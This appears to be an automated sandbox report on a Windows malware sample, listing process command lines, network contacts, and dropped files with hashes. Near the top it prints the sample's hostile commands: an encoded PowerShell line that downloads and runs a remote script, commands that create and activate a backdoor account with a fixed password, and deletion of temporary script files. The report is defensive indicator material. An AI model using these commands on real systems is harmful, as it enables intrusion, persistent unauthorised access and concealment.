cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\System32\cmd.exe
cmd.exe /C net user wgautilacc 111213&net user wgautilacc /active:yes
C:\Windows\system32\net.exe
net user wgautilacc 111213
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc 111213
C:\Windows\system32\net.exe
net user wgautilacc /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc /active:yes
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
Network
| N/A | 8.8.8.8:53 | ocsp.verisign.com | udp |
| N/A | 23.51.123.27:80 | ocsp.verisign.com | tcp |
Files
memory/1652-60-0x0000000075561000-0x0000000075563000-memory.dmp
\Users\Admin\AppData\Local\Temp\1550642269.exe
| MD5 | 9281db9b395b406a6c2107625502d8ff |
| SHA1 | 07d6d1996e04b863c162d5f93b02fd58ca881177 |
| SHA256 | 72b31e583907d15bb1e8ec5a37dc088b03daa50d58ce611d72aa7ab292824006 |
| SHA512 | 017c462fe75266f59ef4f02bd7662455e9c2fb8f2275112b0ca8a77f5871ae217e880b3da29cc712c7eeed82846c7f7f5b8356b8bb1d3f56336a710218fe262b |
memory/1696-62-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1550642269.exe
| MD5 | 9281db9b395b406a6c2107625502d8ff |
| SHA1 | 07d6d1996e04b863c162d5f93b02fd58ca881177 |
| SHA256 | 72b31e583907d15bb1e8ec5a37dc088b03daa50d58ce611d72aa7ab292824006 |
| SHA512 | 017c462fe75266f59ef4f02bd7662455e9c2fb8f2275112b0ca8a77f5871ae217e880b3da29cc712c7eeed82846c7f7f5b8356b8bb1d3f56336a710218fe262b |
C:\Users\Admin\AppData\Local\Temp\1550642269.exe
| MD5 | 9281db9b395b406a6c2107625502d8ff |
| SHA1 | 07d6d1996e04b863c162d5f93b02fd58ca881177 |
| SHA256 | 72b31e583907d15bb1e8ec5a37dc088b03daa50d58ce611d72aa7ab292824006 |
| SHA512 | 017c462fe75266f59ef4f02bd7662455e9c2fb8f2275112b0ca8a77f5871ae217e880b3da29cc712c7eeed82846c7f7f5b8356b8bb1d3f56336a710218fe262b |
memory/1696-65-0x0000000001050000-0x0000000001051000-memory.dmp
memory/1696-68-0x0000000000FA0000-0x0000000000FA1000-memory.dmp
memory/1696-69-0x00000000009F0000-0x0000000000A11000-memory.dmp
\Users\Admin\AppData\Local\Temp\1550642269.exe
| MD5 | 9281db9b395b406a6c2107625502d8ff |
| SHA1 | 07d6d1996e04b863c162d5f93b02fd58ca881177 |
| SHA256 | 72b31e583907d15bb1e8ec5a37dc088b03daa50d58ce611d72aa7ab292824006 |
| SHA512 | 017c462fe75266f59ef4f02bd7662455e9c2fb8f2275112b0ca8a77f5871ae217e880b3da29cc712c7eeed82846c7f7f5b8356b8bb1d3f56336a710218fe262b |
memory/732-71-0x0000000000400000-0x000000000041E000-memory.dmp
memory/732-72-0x0000000000418E56-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1550642269.exe
| MD5 | 9281db9b395b406a6c2107625502d8ff |
| SHA1 | 07d6d1996e04b863c162d5f93b02fd58ca881177 |
| SHA256 | 72b31e583907d15bb1e8ec5a37dc088b03daa50d58ce611d72aa7ab292824006 |
| SHA512 | 017c462fe75266f59ef4f02bd7662455e9c2fb8f2275112b0ca8a77f5871ae217e880b3da29cc712c7eeed82846c7f7f5b8356b8bb1d3f56336a710218fe262b |
memory/732-74-0x0000000000400000-0x000000000041E000-memory.dmp
\Users\Admin\AppData\Local\Temp\1261989323.exe
| MD5 | e00d6b79ce6cf02372bb5ebad9fc0f28 |
| SHA1 | b95cfc181260cacdde0a90c404df04eee0e3e2f0 |
| SHA256 | e9292c0f88c16dbb6496656b89251124dabfe3b062d136817efb76d9d73ecd82 |
| SHA512 | e8d3677a399ef1784338099277f2ac77852f9fb46fc8a007910d096b4da22375046201fa66e6b3419d73f968c36110c6fb2bf6b7e0f113f79e4f37eb4ece9c7b |
memory/944-77-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1261989323.exe
| MD5 | e00d6b79ce6cf02372bb5ebad9fc0f28 |
| SHA1 | b95cfc181260cacdde0a90c404df04eee0e3e2f0 |
| SHA256 | e9292c0f88c16dbb6496656b89251124dabfe3b062d136817efb76d9d73ecd82 |
| SHA512 | e8d3677a399ef1784338099277f2ac77852f9fb46fc8a007910d096b4da22375046201fa66e6b3419d73f968c36110c6fb2bf6b7e0f113f79e4f37eb4ece9c7b |
C:\Users\Admin\AppData\Local\Temp\1261989323.exe
| MD5 | e00d6b79ce6cf02372bb5ebad9fc0f28 |
| SHA1 | b95cfc181260cacdde0a90c404df04eee0e3e2f0 |
| SHA256 | e9292c0f88c16dbb6496656b89251124dabfe3b062d136817efb76d9d73ecd82 |
| SHA512 | e8d3677a399ef1784338099277f2ac77852f9fb46fc8a007910d096b4da22375046201fa66e6b3419d73f968c36110c6fb2bf6b7e0f113f79e4f37eb4ece9c7b |
memory/944-80-0x0000000000EE0000-0x0000000000EE1000-memory.dmp
memory/1672-82-0x0000000000000000-mapping.dmp
memory/944-84-0x000000001B2F0000-0x000000001B2F2000-memory.dmp
memory/732-83-0x0000000004E00000-0x0000000004E01000-memory.dmp
memory/1688-85-0x0000000000000000-mapping.dmp
memory/944-86-0x00000000003D0000-0x00000000003D1000-memory.dmp
memory/1688-87-0x000007FEFB881000-0x000007FEFB883000-memory.dmp
memory/1624-88-0x0000000000000000-mapping.dmp
memory/1328-89-0x0000000000000000-mapping.dmp
memory/268-90-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | efd4cdc71ae776f2eaae2f3499c9ad2b |
| SHA1 | 1d353a95489e8d6ddc66fe2451122fa153268206 |
| SHA256 | 39db60ad131b4855b5dbfb85f30df0a9fad0127918a281b16932471d614a89c8 |
| SHA512 | 128e54adf334ce387e5bce5513cdbef9c25607996928c9b1cf2136c4d9c584d6cecffc870470db5fa3017ab600f7f8eda3348b087138f4380376d0cfaed5833c |
memory/1696-92-0x0000000000000000-mapping.dmp
memory/1696-94-0x00000000023E0000-0x00000000023E1000-memory.dmp
memory/1696-95-0x000000001AC40000-0x000000001AC41000-memory.dmp
memory/1696-96-0x0000000002640000-0x0000000002641000-memory.dmp
memory/1696-97-0x000000001ABC0000-0x000000001ABC2000-memory.dmp
memory/1696-98-0x000000001ABC4000-0x000000001ABC6000-memory.dmp
memory/1696-99-0x0000000002670000-0x0000000002671000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\sgyae4t\imagestore.dat
| MD5 | ed0a8d8e21e8567cb039620edf980198 |
| SHA1 | 473f77f2caf9bd9f77878e2e5b4e701a81cae15d |
| SHA256 | 21460327abba323c1487a0686de14d66065ff4ef3637415c8970af2d4c3f76a0 |
| SHA512 | 09bc090fc1272ab5f3b4a969b5f967ef3baf240fa4a88224f00175f25fd0b1cc56d36f1ce601f9f8a78045cafc3e3a2daaead79a13ee5c0ab463c39c1ce5316d |
memory/1696-101-0x000000001B750000-0x000000001B751000-memory.dmp
memory/1696-102-0x000000001AB00000-0x000000001AB01000-memory.dmp
memory/1696-103-0x0000000002740000-0x000000000274E000-memory.dmp
memory/560-104-0x0000000000400000-0x000000000041E000-memory.dmp
memory/560-105-0x0000000000418F66-mapping.dmp
memory/560-106-0x0000000000400000-0x000000000041E000-memory.dmp
memory/560-108-0x0000000001010000-0x0000000001011000-memory.dmp
\Users\Admin\AppData\Local\Temp\clr.exe
| MD5 | 472208d7ba18d4c14b7e90b9db5d6feb |
| SHA1 | ff24cc43998ff99e61b1a838e1d51c4888498935 |
| SHA256 | ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d |
| SHA512 | 9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15 |
memory/876-111-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\clr.exe
| MD5 | 472208d7ba18d4c14b7e90b9db5d6feb |
| SHA1 | ff24cc43998ff99e61b1a838e1d51c4888498935 |
| SHA256 | ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d |
| SHA512 | 9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15 |
C:\Users\Admin\AppData\Local\Temp\clr.exe
| MD5 | 472208d7ba18d4c14b7e90b9db5d6feb |
| SHA1 | ff24cc43998ff99e61b1a838e1d51c4888498935 |
| SHA256 | ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d |
| SHA512 | 9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15 |
memory/876-113-0x00000000412C0000-0x00000000416E0000-memory.dmp
memory/876-116-0x0000000040E24000-0x0000000040E26000-memory.dmp
memory/876-118-0x0000000040E27000-0x0000000040E28000-memory.dmp
memory/876-117-0x0000000040E26000-0x0000000040E27000-memory.dmp
memory/876-115-0x0000000040E22000-0x0000000040E24000-memory.dmp
memory/940-119-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | c45b6f6897dd66df41f87b75b5303cfd |
| SHA1 | 88e407b5b02982b9231831b6ffe0f538e17a39dd |
| SHA256 | 35fa1806f6be7067d8cf6b88c44927cb69f507f886a2819aa97e290df12f8a0c |
| SHA512 | 63e187aa04584fc3744dcf1743e529379307e490df2082cfade5fbc825933f6f2046d6500888852200229839aed945c27fac45e5cbde3582a6ac0da07ad1a8de |
memory/940-122-0x0000000002430000-0x0000000002431000-memory.dmp
memory/940-123-0x000000001AB10000-0x000000001AB11000-memory.dmp
memory/940-124-0x0000000002380000-0x0000000002381000-memory.dmp
memory/940-126-0x000000001AA94000-0x000000001AA96000-memory.dmp
memory/940-125-0x000000001AA90000-0x000000001AA92000-memory.dmp
memory/940-127-0x0000000002500000-0x0000000002501000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ready.ps1
| MD5 | 3447df88de7128bdc34942334b2fab98 |
| SHA1 | 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb |
| SHA256 | 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9 |
| SHA512 | 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | a595aec1979c62ceafa0eabdc5409ab5 |
| SHA1 | c3d3a223aac134bd7751eecd85858d9a019e233a |
| SHA256 | 036ee84d6066af194338302f602456179da3d28eb80ed6b38afd3dc2b71b230a |
| SHA512 | 3d8c8daf4a07583290517878112b94aee6df7f8121bdf90530b8a76937809a2dec658bd0874d4b01444747c70a80951b586650115c61fccee8a2c650ee9e1d11 |
memory/940-130-0x000000001B560000-0x000000001B561000-memory.dmp
memory/672-131-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\li0ngda1\li0ngda1.cmdline
| MD5 | d9728dc1e7caf965ad65923a7e3b11a6 |
| SHA1 | 47b91d70e21296b3b16caccba1bf04390c756110 |
| SHA256 | 3174bb103d1c568b1e1fc0d1af9a2f44123d3895a8f760d1f92277b870924ed4 |
| SHA512 | a8b18013be149af50ca82c4ce1a34ec40c52c04edb1681200ae557512b4c1e559c32c4289db1b66a0999579fc017324a4a90360e208684653ee9fad3bfba6691 |
\??\c:\Users\Admin\AppData\Local\Temp\li0ngda1\li0ngda1.0.cs
| MD5 | 4864fc038c0b4d61f508d402317c6e9a |
| SHA1 | 72171db3eea76ecff3f7f173b0de0d277b0fede7 |
| SHA256 | 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84 |
| SHA512 | 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31 |
memory/912-134-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\li0ngda1\CSC68A5B573BB724897BDD73A04FCEFF5F.TMP
| MD5 | b64e5b5a610902efbbe195097329a5bf |
| SHA1 | 11ce01fab40f08594a5d65504816d27e09e1223e |
| SHA256 | 19d388e1663c72fda719712b03ea4cf19be7d75b47f4b2e7871039716c02903e |
| SHA512 | 6fd7a9bf996072c27c131ae137c864406aca6cbab74d9e774ca0db3c6c4080ba64b28613580a7ae445288b7adf3b19a8a913c24e984bc35afb07dea81fa6b25c |
C:\Users\Admin\AppData\Local\Temp\RES9656.tmp
| MD5 | 876a946870634ff64b462403507e985e |
| SHA1 | 98e62659c1fddec89f985d818f11b9fe4f375bf5 |
| SHA256 | 2915e03fdf7f7c3bc432e9aa4448a70b40a3b41f24ab97fde16c8e61c6d997c8 |
| SHA512 | 86a60c947a63d62573b4d33c563fca7c362304527bef452ef4ef8476e80313a7fcbdd826d42935f4d32dd0eb7738f1f12d8b1f7e2fc310c933163d600d75f47f |
C:\Users\Admin\AppData\Local\Temp\li0ngda1\li0ngda1.dll
| MD5 | 5d3e9f2e89e58208dae437ce831ed5e8 |
| SHA1 | 39201fbf8c5ea8d70d6391b47d0cdb2ac932a74c |
| SHA256 | c64f1727beeeeea195792d4f3508d55245f69517ad78060f827c8db198b0cb4b |
| SHA512 | dc6818f389bdb4d31def9a3b6b7b24caff847f441bd5d664b965ec643a3b0b20940273aa87bd34d7395516218c0e466ffed7eaeb2906ff1e60211b17d5d178e7 |
memory/940-138-0x0000000002470000-0x0000000002471000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
| MD5 | 00fb904b2dd958760943b89400e9b7f9 |
| SHA1 | 8c825862b6f70cbaef991525f31100f713e61e7d |
| SHA256 | 392e751cec2e13cbbea5161ae4044532961f8e9013cebaa120ac7553388c919a |
| SHA512 | ee4c598b268768f2a2063064ff2a771042bfa5b41e4c5029cb297a17c265a93ab749a3ffecfe28d9e5084068d77e487d14291e780a3d6da1e0fcfbc26b6bc28a |
memory/940-140-0x000000001B7C0000-0x000000001B7C1000-memory.dmp
memory/940-141-0x000000001B840000-0x000000001B841000-memory.dmp
memory/940-142-0x00000000025E0000-0x00000000025E1000-memory.dmp
memory/1664-143-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 6de8868439a8983fcfb3c56e27bd9f8a |
| SHA1 | 0ee941befc1c766299c68447ef66fc77eeb06e87 |
| SHA256 | 1c51525a81f2b978114001fd83aace6097ba9b806b2c91be130edfcd4b83fda6 |
| SHA512 | 891234f62c44c73375dc1430588397e35c35b36a96b5244c5a8dd8a435cd7c7039746afe534d210290ba4cbc6591ff72797cbd83910cc0327cd0de2211ea26d3 |
memory/1664-148-0x000000001AC70000-0x000000001AC72000-memory.dmp
memory/1664-149-0x000000001AC74000-0x000000001AC76000-memory.dmp
memory/1664-151-0x0000000002440000-0x0000000002441000-memory.dmp
memory/1664-153-0x0000000002630000-0x0000000002631000-memory.dmp
memory/1664-155-0x000000001A950000-0x000000001A951000-memory.dmp
memory/1664-156-0x00000000025A0000-0x00000000025A1000-memory.dmp
memory/940-157-0x000000001AA9A000-0x000000001AAB9000-memory.dmp
\??\PIPE\lsarpc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | fd45ebd976278f818280ca44c9776add |
| SHA1 | 2218dc4f6c86ac14359c578f9d96e670605e540c |
| SHA256 | c4475679f0a18589ea4744e0331cb353447247ebd3111cd97636e436b750eea9 |
| SHA512 | 3f3608229d2d458be2be5024a2ccad547396cff6eff9b78c8b691191123e4f926fef3aa3de0e3dd9e56143a92c47aa7179afb77a925c655121d049dd80c6d1b6 |
memory/1664-163-0x000000001B640000-0x000000001B641000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4c3687eb-0da9-4c9f-b15e-0837f5edd9fe
| MD5 | 6f0d509e28be1af95ba237d4f43adab4 |
| SHA1 | c665febe79e435843553bee86a6cea731ce6c5e4 |
| SHA256 | f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e |
| SHA512 | 8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797 |
memory/1664-176-0x000000001B5A0000-0x000000001B5A1000-memory.dmp
memory/1664-177-0x000000001B5B0000-0x000000001B5B1000-memory.dmp
memory/1624-178-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 6de8868439a8983fcfb3c56e27bd9f8a |
| SHA1 | 0ee941befc1c766299c68447ef66fc77eeb06e87 |
| SHA256 | 1c51525a81f2b978114001fd83aace6097ba9b806b2c91be130edfcd4b83fda6 |
| SHA512 | 891234f62c44c73375dc1430588397e35c35b36a96b5244c5a8dd8a435cd7c7039746afe534d210290ba4cbc6591ff72797cbd83910cc0327cd0de2211ea26d3 |
memory/1624-184-0x000000001AC10000-0x000000001AC12000-memory.dmp
memory/1624-185-0x000000001AC14000-0x000000001AC16000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | 4ab9e29c553fbcd54d39495169e04662 |
| SHA1 | 43c42e9accbc4dfdb27aa9e0542053f154130dff |
| SHA256 | eb1260170f993c0ca27b7f772c7a7fa43fb4d321161caf426f820c74c60e5f9f |
| SHA512 | b1409fd87147c871890165ac24246cce42d23e890981deeae4c8f3087575c413ab4a0559530d04e29e66ebdc2d9ac9af970d7d4b3d79091dd2209cc65b4d1f6a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5d589aa7-e946-4ee7-abaa-9615da7f3129
| MD5 | a70ee38af4bb2b5ed3eeb7cbd1a12fa3 |
| SHA1 | 81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9 |
| SHA256 | dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d |
| SHA512 | 8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_264bafee-bf30-4355-ad72-5bf7979cfc2a
| MD5 | faa37917b36371249ac9fcf93317bf97 |
| SHA1 | a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4 |
| SHA256 | b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132 |
| SHA512 | 614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_17a44acb-fe68-42f3-9cc3-d5bb8954976e
| MD5 | 2d5cd190b5db0620cd62e3cd6ba1dcd3 |
| SHA1 | ff4f229f4fbacccdf11d98c04ba756bda80aac7a |
| SHA256 | ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d |
| SHA512 | edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_633570ee-6616-4526-b401-6145b5104372
| MD5 | d89968acfbd0cd60b51df04860d99896 |
| SHA1 | b3c29916ccb81ce98f95bbf3aa8a73de16298b29 |
| SHA256 | 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9 |
| SHA512 | b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_af569bf9-a3b0-401f-89f0-6243fe22a9f6
| MD5 | e5b3ba61c3cf07deda462c9b27eb4166 |
| SHA1 | b324dad73048be6e27467315f82b7a5c1438a1f9 |
| SHA256 | b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925 |
| SHA512 | a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_41a3bea5-07c0-4dc0-b129-ab20944650b3
| MD5 | 7f79b990cb5ed648f9e583fe35527aa7 |
| SHA1 | 71b177b48c8bd745ef02c2affad79ca222da7c33 |
| SHA256 | 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683 |
| SHA512 | 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda |
memory/960-199-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 6de8868439a8983fcfb3c56e27bd9f8a |
| SHA1 | 0ee941befc1c766299c68447ef66fc77eeb06e87 |
| SHA256 | 1c51525a81f2b978114001fd83aace6097ba9b806b2c91be130edfcd4b83fda6 |
| SHA512 | 891234f62c44c73375dc1430588397e35c35b36a96b5244c5a8dd8a435cd7c7039746afe534d210290ba4cbc6591ff72797cbd83910cc0327cd0de2211ea26d3 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/960-205-0x000000001ABD0000-0x000000001ABD2000-memory.dmp
memory/960-206-0x000000001ABD4000-0x000000001ABD6000-memory.dmp
memory/1156-215-0x0000000000000000-mapping.dmp
C:\Windows\system32\rfxvmt.dll
| MD5 | dc39d23e4c0e681fad7a3e1342a2843c |
| SHA1 | 58fd7d50c2dca464a128f5e0435d6f0515e62073 |
| SHA256 | 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9 |
| SHA512 | 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7 |
memory/1332-217-0x0000000000000000-mapping.dmp
memory/1020-218-0x0000000000000000-mapping.dmp
memory/2032-219-0x0000000000000000-mapping.dmp
memory/2016-220-0x0000000000000000-mapping.dmp
memory/1808-221-0x0000000000000000-mapping.dmp
memory/912-222-0x0000000000000000-mapping.dmp
memory/428-223-0x0000000000000000-mapping.dmp
memory/1156-224-0x0000000000000000-mapping.dmp
memory/2040-225-0x0000000000000000-mapping.dmp
memory/1020-226-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | dc9d4cb6f3d8cb2de5f60c656e78b369 |
| SHA1 | 5db2f00f82fd78bebcdc27ec553443534e501489 |
| SHA256 | b9da6eedf79e71d7de33e90166af27ce5d4d3a7df0958e18bf4b48843d3b3b1a |
| SHA512 | 4376089ce79dcfe21f8e22e70c62ee6293b2e0e58b99e5cf091b7a17d7552cd541c493105451d8fd1b3401ebc4e7b6884f8e6e5fd47d93cb83d87ce15516df94 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 2902de11e30dcc620b184e3bb0f0c1cb |
| SHA1 | 5d11d14a2558801a2688dc2d6dfad39ac294f222 |
| SHA256 | e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544 |
| SHA512 | efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\F9WBQWYI.txt
| MD5 | e3499a1069b8251a7a9b014e9b7145c0 |
| SHA1 | d2590f975be408c0cc57943859e49e4542bef656 |
| SHA256 | 7a5fa8904c8269ffe304a17cc6ebf1cbddbf5b83563e0694d1c8a445e1b215d6 |
| SHA512 | d5a913627b2e2d9f18bda9cd40f5cdf03b5b282c4c40e0e448a965f7ecf10c2bfb94a6a87741cbeb4f7af72a052835655ba8422f52194979e9c09eae29b19792 |
memory/1848-230-0x0000000000000000-mapping.dmp
memory/1508-231-0x0000000000000000-mapping.dmp
memory/2040-232-0x0000000000000000-mapping.dmp
memory/1716-233-0x0000000000000000-mapping.dmp
memory/2016-234-0x0000000000000000-mapping.dmp
memory/1020-235-0x0000000000000000-mapping.dmp
memory/1544-236-0x0000000000000000-mapping.dmp
memory/1156-237-0x0000000000000000-mapping.dmp
memory/2032-238-0x0000000000000000-mapping.dmp
memory/1116-239-0x0000000000000000-mapping.dmp
\Windows\Branding\mediasrv.png
| MD5 | b110f38845e18a04ab59a7d8a134ef40 |
| SHA1 | 8119030034e6fbe62d875e824b5233c1f29d61a0 |
| SHA256 | 1cbd533a8cf6875e9b9bc60b11711b591bd30aac6377a11ee90c2735182414ea |
| SHA512 | 80eb80651141c2e00165f089700cc15eb3c5e5eee4ce4e91759e63f5230db8445bc3793c0f5fd259f98ce2939f19633fe7225db990e6574fd739f1d29cf7f223 |
\Windows\Branding\mediasvc.png
| MD5 | 5768a809b9fcbff117dffa8cbf2e8852 |
| SHA1 | a056e76d15bc7509d0361175b2ae4ba348460cd6 |
| SHA256 | 8ab19cdbe2b963c8bcf8cac6a11e003423ec91ffad88d885d550beb835e46094 |
